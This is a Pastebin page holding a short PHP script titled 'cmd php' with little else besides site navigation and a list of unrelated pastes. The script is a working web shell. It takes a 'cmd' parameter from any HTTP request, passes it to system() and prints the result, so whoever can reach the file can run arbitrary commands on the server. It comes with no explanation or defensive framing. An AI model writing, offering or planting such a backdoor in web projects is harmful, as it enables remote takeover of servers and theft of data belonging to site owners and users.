Pastebin
API
tools
faq
paste
Login
Sign up
SHARE
TWEET
cmd php
CreadPag
Jan 14th, 2019
116
0
Never
Add comment
Not a member of Pastebin yet?
Sign Up
, it unlocks many cool features!
PHP
0.16 KB
| None
|
0
0
raw
download
clone
embed
print
report
<?php
if
(
isset
(
$_REQUEST
[
'cmd'
]
)
)
{
echo
"<pre>"
;
$cmd
=
(
$_REQUEST
[
'cmd'
]
)
;
system
(
$cmd
)
;
echo
"</pre>"
;
die
;
}
?>
Add Comment
Please,
Sign In
to add comment
Public Pastes
webinar-python-exam-review-2023-09-23
Python | 8 min ago | 6.03 KB
Untitled
C++ | 10 min ago | 1.42 KB
COCI 2008 - DP
C++ | 14 min ago | 3.57 KB
Online Education
Python | 45 min ago | 0.53 KB
Online Education
C++ | 1 hour ago | 0.77 KB
Online Education
JavaScript | 1 hour ago | 0.74 KB
Online Education
C# | 1 hour ago | 1.12 KB
Credit System
Python | 1 hour ago | 0.45 KB
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the
Cookies Policy
.
OK, I Understand
Not a member of Pastebin yet?
Sign Up
, it unlocks many cool features!